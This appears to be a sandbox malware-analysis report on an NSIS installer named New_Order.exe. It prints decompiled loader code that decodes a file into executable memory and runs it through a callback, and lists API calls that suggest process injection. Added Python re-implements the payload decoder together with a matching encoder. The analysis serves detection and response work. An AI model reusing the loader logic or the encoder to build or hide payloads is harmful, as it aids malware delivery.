                                                                        				_v36.Control = 4;                     // SE_DACL_PRESENT
                                                                        				_v36.Dacl = 0x408374;
                                                                        				_v16.nLength = 0xc;                   // sizeof(SECURITY_ATTRIBUTES) on 32-bit
                                                                        				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                        				if(_t22 != 0) {
                                                                        					L1:
                                                                        					return 0;
                                                                        				}
                                                                        				_t23 = GetLastError();
                                                                        				if(_t23 == 0xb7) {                    // ERROR_ALREADY_EXISTS: re-apply the ACL to the existing directory
                                                                        					// 0x80000007 = PROTECTED_DACL | OWNER | GROUP | DACL _SECURITY_INFORMATION
                                                                        					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                        						goto L1;
                                                                        					}
                                                                        					return GetLastError();
                                                                        				}
                                                                        				return _t23;                          // any other CreateDirectoryA error is passed up
                                                                        			}







                                                                        Instruction address column only (0x004056ef to 0x0040575e; 0x00000000 entries carry no address): the disassembly text for this listing did not survive export.

                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                        • GetLastError.KERNEL32 ref: 0040573B
                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                        • GetLastError.KERNEL32 ref: 0040575A
                                                                        Strings
                                                                        • C:\Users\user\Desktop, xrefs: 004056E4
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                        • API String ID: 3449924974-1521822154
                                                                        • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                        • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                        • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                        • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406492(intOrPtr _a4) {
                                                                        				char _v292[0x104];                    // MAX_PATH buffer for "<system dir>\<name>.dll"
                                                                        				int _t10;
                                                                        				struct HINSTANCE__* _t14;
                                                                        				void* _t16;

                                                                        				_t10 = GetSystemDirectoryA(_v292, 0x104);
                                                                        				if(_t10 > 0x104) {                    // buffer too small: treat as failure
                                                                        					_t10 = 0;
                                                                        				}
                                                                        				// Insert a separator only if the directory does not already end in '\'.
                                                                        				// 0x40a014 holds "\"; offset 1 points at its terminating NUL, i.e. "".
                                                                        				if(_t10 == 0 || _v292[_t10 - 1] == 0x5c) {
                                                                        					_t16 = 1;
                                                                        				} else {
                                                                        					_t16 = 0;
                                                                        				}
                                                                        				wsprintfA(_v292 + _t10, "%s%s.dll", (char*)(_t16 + 0x40a014), _a4);
                                                                        				// 8 = LOAD_WITH_ALTERED_SEARCH_PATH with an absolute System32 path, so a DLL
                                                                        				// such as UXTHEME is taken from the system directory and not from the
                                                                        				// directory the executable was started from. If GetSystemDirectoryA failed
                                                                        				// (_t10 == 0) the path degrades to a bare "<name>.dll" and the normal search order applies.
                                                                        				_t14 = LoadLibraryExA(_v292, 0, 8); // executed
                                                                        				return _t14;
                                                                        			}








                                                                        Instruction address column only (0x004064a9 to 0x004064fd): the disassembly text for this listing did not survive export.

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                                        • wsprintfA.USER32 ref: 004064E2
                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-4240819195
                                                                        • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                        • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                        • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                        • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                        				// Arguments on entry are (CHAR* out_buf, CHAR* dir). The decompiler shows the
                                                                        				// first slot as _a4/_a6 because, after the output pointer is saved in _t21,
                                                                        				// the slot is reused as the 4-byte prefix string "nsa\0"; _a6 aliases bytes 2..3.
                                                                        				char _t11;
                                                                        				signed int _t12;
                                                                        				int _t15;
                                                                        				signed int _t17;
                                                                        				void* _t20;
                                                                        				CHAR* _t21;

                                                                        				_t21 = _a4;                                       // output buffer
                                                                        				_t20 = 0x64;                                      // at most 100 attempts
                                                                        				while(1) {
                                                                        					_t11 =  *0x40a3d4;                            // "nsa" (0x0061736e, little-endian)
                                                                        					_t20 = _t20 - 1;
                                                                        					_a4 = _t11;                                   // reset prefix to "nsa" each round
                                                                        					_t12 = GetTickCount();
                                                                        					_t17 = 0x1a;
                                                                        					_a6 = _a6 + _t12 % _t17;                      // third char becomes 'a' + (tick % 26): prefix "ns[a-z]"
                                                                        					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed; uUnique == 0 creates "<dir>\ns?XXXX.tmp" and returns its name
                                                                        					if(_t15 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t20 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					 *_t21 = 0;                                   // every attempt failed: return an empty string
                                                                        					return _t15;
                                                                        				}
                                                                        				return _t21;
                                                                        			}









                                                                        Instruction address column only (0x00405cc3 to 0x00405cfb; 0x00000000 entries carry no address): the disassembly text for this listing did not survive export.

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405CD3
                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                        Strings
                                                                        • "C:\Users\user\Desktop\New_Order.exe" , xrefs: 00405CBF
                                                                        • nsa, xrefs: 00405CCA
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-3552012503
                                                                        • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                        • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                        • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                        • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
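The routines E00405CBF (temp-file prefix "nsa" plus a tick-derived letter) and E00406492 (DLL path under the system directory) decide which file names the stub creates and where it loads helper DLLs from, which is what a responder needs to hunt for the dropped files. The following Python is an added example for this report, not code from the sample: it re-implements both decompiled routines so that the resulting names can be predicted and matched. It assumes the GetTempFileName name format `<dir>\<pre><uuuu>.tmp` with one to four hex digits (the documented behaviour for uUnique == 0) and takes the tick count as a parameter instead of calling GetTickCount(); the observed paths in the main block are constructed, not taken from the report.

```python
r"""Re-implementation of the temp-name and system-DLL helpers decompiled above.

Added example for this report (not code from the sample). Assumptions:
  * GetTempFileNameA with uUnique == 0 yields "<dir>\<pre><uuuu>.tmp", where
    <uuuu> is 1-4 hex digits (Microsoft's documented name format);
  * the tick count is passed in instead of calling GetTickCount().
"""
import re
from typing import Iterable, List

PREFIX_DWORD = 0x0061736E   # "nsa\0" as stored at 0x40a3d4 in the sample (little-endian)
SEPARATOR = "\\"            # the "\" string at 0x40a014
MAX_PATH = 0x104


def temp_prefix(tick_count: int) -> str:
    """Prefix E00405CBF hands to GetTempFileNameA: byte 2 of "nsa" advanced by tick % 26."""
    prefix = bytearray(PREFIX_DWORD.to_bytes(4, "little"))   # b"nsa\x00"
    prefix[2] = prefix[2] + tick_count % 0x1A                # _a6 += GetTickCount() % 26
    return prefix[:3].decode("ascii")                        # "ns" followed by one of a..z


def temp_name_pattern(directory: str) -> "re.Pattern[str]":
    """Regex for every file name the routine can create inside `directory`."""
    base = re.escape(directory.rstrip("\\"))
    return re.compile(base + r"\\ns[a-z][0-9a-f]{1,4}\.tmp$", re.IGNORECASE)


def find_stub_temp_files(paths: Iterable[str], directory: str) -> List[str]:
    """Filter observed file paths down to those matching the stub's naming scheme."""
    pattern = temp_name_pattern(directory)
    return [p for p in paths if pattern.match(p)]


def system_dll_path(system_dir: str, name: str) -> str:
    """Path built by E00406492: "<sysdir>\<name>.dll", inserting "\" only when missing.

    A GetSystemDirectoryA result of 0 (failure) or above MAX_PATH (truncation)
    degrades to a bare "<name>.dll", exactly as the decompiled branch does.
    """
    cch = len(system_dir)
    if cch > MAX_PATH:
        cch = 0
    sep = "" if cch == 0 or system_dir[cch - 1] == "\\" else SEPARATOR
    return system_dir[:cch] + sep + name + ".dll"


if __name__ == "__main__":
    # Constructed file-creation events, not taken from the report
    observed = [
        "C:\\Users\\user\\AppData\\Local\\Temp\\nsa1F3C.tmp",
        "C:\\Users\\user\\AppData\\Local\\Temp\\nsz7A02.tmp",
        "C:\\Users\\user\\AppData\\Local\\Temp\\tmpA1B2.tmp",
        "C:\\Users\\user\\Desktop\\New_Order.exe",
    ]
    print(find_stub_temp_files(observed, "C:\\Users\\user\\AppData\\Local\\Temp\\"))
    print(system_dll_path("C:\\Windows\\system32", "UXTHEME"))
```

Because the prefix letter is derived from the tick count, the only stable part of the name is `ns` plus a lower-case letter, so the pattern matches on that structure rather than on a fixed prefix; a match on a name alone is weak evidence on its own and should be paired with the drop-and-execute behaviour listed in the report.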

                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 024D0492
                                                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 024D04B5
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024D04D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThread
                                                                        • String ID:
                                                                        • API String ID: 2411489757-0
                                                                        • Opcode ID: 2d8a7ba5af06e96742818b02aa258f7c2c6646f6b5f1bff6dbef97253908cfd2
                                                                        • Instruction ID: 71cab83771853035a58a9c645945f1bb3068ef0e6f75e79facca131dfd7c292b
                                                                        • Opcode Fuzzy Hash: 2d8a7ba5af06e96742818b02aa258f7c2c6646f6b5f1bff6dbef97253908cfd2
                                                                        • Instruction Fuzzy Hash: 0C422635E40258EEEB60CBA4DC65BFDB7B5AF08704F20549AE608FB2A0D7705A81DF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E10001120(void* __eflags) {
                                                                        				signed int _v5;
                                                                        				signed int _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				long _v24;
                                                                        				long _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				void* _v48;
                                                                        				intOrPtr _v52;
                                                                        				short _v572;
                                                                        				int _t99;
                                                                        
                                                                        				_v12 = 0;
                                                                        				_v28 = 0;
                                                                        				_v16 = E10001000();
                                                                        				_v40 = E10001070(_v16, 0x8a111d91);
                                                                        				_v32 = E10001070(_v16, 0xcbec1a0);
                                                                        				_v36 = E10001070(_v16, 0xa4f84a9a);
                                                                        				_v52 = E10001070(_v16, 0x433a3842);
                                                                        				_v44 = E10001070(_v16, 0xa5f15738);
                                                                        				_v32(0x103,  &_v572);
                                                                        				_v36( &_v572, 0x10003000);
                                                                        				_v48 = CreateFileW( &_v572, 0x80000000, 7, 0, 3, 0x80, 0); // GENERIC_READ, share read/write/delete, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                                                                        				_v24 = 0x1c05;
                                                                        				_v20 = VirtualAlloc(0, _v24, 0x3000, 0x40); // MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
                                                                        				ReadFile(_v48, _v20, _v24,  &_v28, 0); // whole file lands in the RWX buffer; _v28 = bytes actually read
                                                                        				_v12 = 0;
                                                                        				while(_v12 < _v28) {
                                                                        					_v5 =  *((intOrPtr*)(_v20 + _v12));
                                                                        					_v5 = (_v5 & 0x000000ff) + _v12;
                                                                        					_v5 =  ~(_v5 & 0x000000ff);
                                                                        					_v5 =  !(_v5 & 0x000000ff);
                                                                        					_v5 = (_v5 & 0x000000ff) - _v12;
                                                                        					_v5 =  !(_v5 & 0x000000ff);
                                                                        					_v5 = _v5 & 0x000000ff ^ 0x00000096;
                                                                        					_v5 =  ~(_v5 & 0x000000ff);
                                                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                                                        					_v5 = (_v5 & 0x000000ff) + 0xaa;
                                                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                                                        					_v5 = (_v5 & 0x000000ff) - _v12;
                                                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                                                        					_v5 = (_v5 & 0x000000ff) - 0xa6;
                                                                        					_v5 =  ~(_v5 & 0x000000ff);
                                                                        					_v5 = (_v5 & 0x000000ff) + 0xa9;
                                                                        					_v5 =  ~(_v5 & 0x000000ff);
                                                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                                        					 *((char*)(_v20 + _v12)) = _v5;
                                                                        					_v12 = _v12 + 1;
                                                                        				}
                                                                        				_t99 = EnumTimeFormatsW(_v20, 0, 0); // executed - the decoded buffer is passed as lpTimeFmtEnumProc, so the first callback dispatch runs it
                                                                        				return _t99;
                                                                        			}

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011DA
                                                                        • VirtualAlloc.KERNELBASE(00000000,00001C05,00003000,00000040), ref: 100011F4
                                                                        • ReadFile.KERNELBASE(?,?,00001C05,00000000,00000000), ref: 1000120C
                                                                        • EnumTimeFormatsW.KERNELBASE(?,00000000,00000000), ref: 10001309
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240764682.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.240760281.0000000010000000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.240769821.0000000010002000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$AllocCreateEnumFormatsReadTimeVirtual
                                                                        • String ID:
                                                                        • API String ID: 2368423067-0
                                                                        • Opcode ID: 29ddb289108b214c17efc509523377428234a433c5d2ffc6af708bc04d2e98a6
                                                                        • Instruction ID: ed6b12713598fad1fe6b878bfadb2f890465dcae5655e68f9b2a8d97fb4e6241
                                                                        • Opcode Fuzzy Hash: 29ddb289108b214c17efc509523377428234a433c5d2ffc6af708bc04d2e98a6
                                                                        • Instruction Fuzzy Hash: 95514A74D4C398BEDF01CBE4C891BEDBFB4AF5A201F0881C9E590B6286D6365749CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
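The loop in E10001120 above is the loader's payload decoder: a file of 0x1c05 bytes is read into a MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE allocation (the 0x3000 and 0x40 arguments to VirtualAlloc), every byte is rewritten in place with the index-dependent transform shown, and the buffer is then handed to EnumTimeFormatsW as its lpTimeFmtEnumProc argument, so the first enumeration callback is what starts the decoded code. The Python below re-implements that transform so the captured file can be decoded offline. It is an added example, not code from the report or from the sample. It assumes that the decompiler's `~` is bitwise NOT and its `!` is two's-complement negation (the disassembly, not this listing, is authoritative; the two helpers are a one-line swap if it turns out the other way round), and the sample input it embeds is constructed, not the real dropped file. Because each step of the loop is invertible, the inverse is included so the decoder can be validated by a round trip.

```python
"""Offline decoder for the per-byte transform in E10001120 (loader DLL at 0x10000000).

Added example, not from the report or the sample.
Assumption: decompiler `~` == bitwise NOT, decompiler `!` == two's-complement NEG.
"""
import sys

PAYLOAD_SIZE = 0x1C05  # size passed to VirtualAlloc / ReadFile in the listing


def _not8(v: int) -> int:
    """Bitwise NOT on one byte: the decompiler's `~` (assumption)."""
    return (~v) & 0xFF


def _neg8(v: int) -> int:
    """Two's-complement negate on one byte: the decompiler's `!` (assumption)."""
    return (-v) & 0xFF


def _ror8(v: int, n: int) -> int:
    n %= 8
    return ((v >> n) | (v << (8 - n))) & 0xFF


def _rol8(v: int, n: int) -> int:
    return _ror8(v, 8 - (n % 8))


def decode_byte(b: int, i: int) -> int:
    """One iteration of the loop body, in the same order as the decompiled code."""
    i &= 0xFF              # _v12 is only ever combined with a single byte
    v = b & 0xFF
    v = (v + i) & 0xFF     # + index
    v = _not8(v)           # ~
    v = _neg8(v)           # !
    v = (v - i) & 0xFF     # - index
    v = _neg8(v)           # !
    v ^= 0x96
    v = _not8(v)           # ~
    v ^= i
    v = (v + 0xAA) & 0xFF
    v ^= i
    v = (v - i) & 0xFF
    v ^= i
    v = (v - 0xA6) & 0xFF
    v = _not8(v)           # ~
    v = (v + 0xA9) & 0xFF
    v = _not8(v)           # ~
    return _ror8(v, 3)     # (v >> 3) | (v << 5), masked to a byte


def encode_byte(b: int, i: int) -> int:
    """Exact inverse of decode_byte: the same invertible steps, applied in reverse."""
    i &= 0xFF
    v = _rol8(b & 0xFF, 3)
    v = _not8(v)
    v = (v - 0xA9) & 0xFF
    v = _not8(v)
    v = (v + 0xA6) & 0xFF
    v ^= i
    v = (v + i) & 0xFF
    v ^= i
    v = (v - 0xAA) & 0xFF
    v ^= i
    v = _not8(v)
    v ^= 0x96
    v = _neg8(v)
    v = (v + i) & 0xFF
    v = _neg8(v)
    v = _not8(v)
    return (v - i) & 0xFF


def decode_payload(data: bytes) -> bytes:
    """Decode a blob the way the loader does before it calls EnumTimeFormatsW."""
    return bytes(decode_byte(b, i) for i, b in enumerate(data))


def encode_payload(data: bytes) -> bytes:
    return bytes(encode_byte(b, i) for i, b in enumerate(data))


# Constructed sample (not the real dropped file): a marker plus enough bytes that
# the index wraps past 0xFF, which exercises the `i & 0xFF` handling.
SAMPLE_PLAIN = (b"constructed-marker " + bytes(range(256))) * 2


def round_trip_ok(data: bytes = SAMPLE_PLAIN) -> bool:
    return decode_payload(encode_payload(data)) == data


if __name__ == "__main__":
    # Usage: python decode_payload.py <captured file> > decoded.bin
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            raw = fh.read()[:PAYLOAD_SIZE]
    else:
        raw = encode_payload(SAMPLE_PLAIN)
    sys.stdout.buffer.write(decode_payload(raw))
```

Only the first 0x1c05 bytes are decoded, which matches what the loader reads. If the decoded blob does not start with plausible code at offset 0, the quickest thing to check is the `~`/`!` assumption against the disassembly, since swapping the two helpers changes every output byte.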

                                                                        C-Code - Quality: 60%
                                                                        			E0040209D(void* __ebx, void* __eflags) {
                                                                        				struct HINSTANCE__* _t18;
                                                                        				struct HINSTANCE__* _t26;
                                                                        				void* _t27;
                                                                        				struct HINSTANCE__* _t30;
                                                                        				CHAR* _t32;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t27 = __ebx;
                                                                        				asm("sbb eax, 0x42f4f8");
                                                                        				 *(_t34 - 4) = 1;
                                                                        				if(__eflags < 0) {
                                                                        					_push(0xffffffe7);
                                                                        					L15:
                                                                        					E00401423();
                                                                        					L16:
                                                                        					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
                                                                        					return 0;
                                                                        				}
                                                                        				_t32 = E00402BCE(0xfffffff0);
                                                                        				 *(_t34 + 8) = E00402BCE(1);
                                                                        				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                        					L3:
                                                                        					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                        					_t30 = _t18;
                                                                        					if(_t30 == _t27) {
                                                                        						_push(0xfffffff6);
                                                                        						goto L15;
                                                                        					}
                                                                        					L4:
                                                                        					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                        					if(_t33 == _t27) {
                                                                        						E0040521E(0xfffffff7,  *(_t34 + 8));
                                                                        					} else {
                                                                        						 *(_t34 - 4) = _t27;
                                                                        						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                        							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed - five-argument call matching the NSIS plugin entry convention (hwndParent, string_size = 0x400, variables, stacktop, extra_parameters)
                                                                        						} else {
                                                                        							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                        							if( *_t33() != 0) {
                                                                        								 *(_t34 - 4) = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
                                                                        						FreeLibrary(_t30);
                                                                        					}
                                                                        					goto L16;
                                                                        				}
                                                                        				_t26 = GetModuleHandleA(_t32); // executed
                                                                        				_t30 = _t26;
                                                                        				if(_t30 != __ebx) {
                                                                        					goto L4;
                                                                        				}
                                                                        				goto L3;
                                                                        			}

                                                                        APIs
                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,7519EA30), ref: 0040527A
                                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2987980305-0
                                                                        • Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                                        • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                        • Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                                        • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E004015BB(char __ebx, void* __eflags) {
                                                                        				void* _t13;
                                                                        				int _t19;
                                                                        				char _t21;
                                                                        				void* _t22;
                                                                        				char _t23;
                                                                        				signed char _t24;
                                                                        				char _t26;
                                                                        				CHAR* _t28;
                                                                        				char* _t32;
                                                                        				void* _t33;
                                                                        
                                                                        				_t26 = __ebx;
                                                                        				_t28 = E00402BCE(0xfffffff0);
                                                                        				_t13 = E00405B28(_t28);
                                                                        				_t30 = _t13;
                                                                        				if(_t13 != __ebx) {
                                                                        					do {
                                                                        						_t32 = E00405ABA(_t30, 0x5c);
                                                                        						_t21 =  *_t32;
                                                                        						 *_t32 = _t26;
                                                                        						 *((char*)(_t33 + 0xb)) = _t21;
                                                                        						if(_t21 != _t26) {
                                                                        							L5:
                                                                        							_t22 = E00405761(_t28);
                                                                        						} else {
                                                                        							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                        							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
                                                                        								goto L5;
                                                                        							} else {
                                                                        								_t22 = E004056E4(_t28); // executed
                                                                        							}
                                                                        						}
                                                                        						if(_t22 != _t26) {
                                                                        							if(_t22 != 0xb7) {
                                                                        								L9:
                                                                        								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                        							} else {
                                                                        								_t24 = GetFileAttributesA(_t28); // executed
                                                                        								if((_t24 & 0x00000010) == 0) {
                                                                        									goto L9;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                        						 *_t32 = _t23;
                                                                        						_t30 = _t32 + 1;
                                                                        					} while (_t23 != _t26);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                        					_push(0xfffffff5);
                                                                        					E00401423();
                                                                        				} else {
                                                                        					E00401423(0xffffffe6);
                                                                        					E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
                                                                        					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                        					if(_t19 == 0) {
                                                                        						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                        					}
                                                                        				}
                                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
                                                                        				return 0;
                                                                        			}
                                                                        0x004015bb
                                                                        0x004015c2
                                                                        0x004015c5
                                                                        0x004015ca
                                                                        0x004015ce
                                                                        0x004015d0
                                                                        0x004015d8
                                                                        0x004015da
                                                                        0x004015dc
                                                                        0x004015e0
                                                                        0x004015e3
                                                                        0x004015fb
                                                                        0x004015fc
                                                                        0x004015e5
                                                                        0x004015e5
                                                                        0x004015e8
                                                                        0x00000000
                                                                        0x004015f3
                                                                        0x004015f4
                                                                        0x004015f4
                                                                        0x004015e8
                                                                        0x00401603
                                                                        0x0040160a
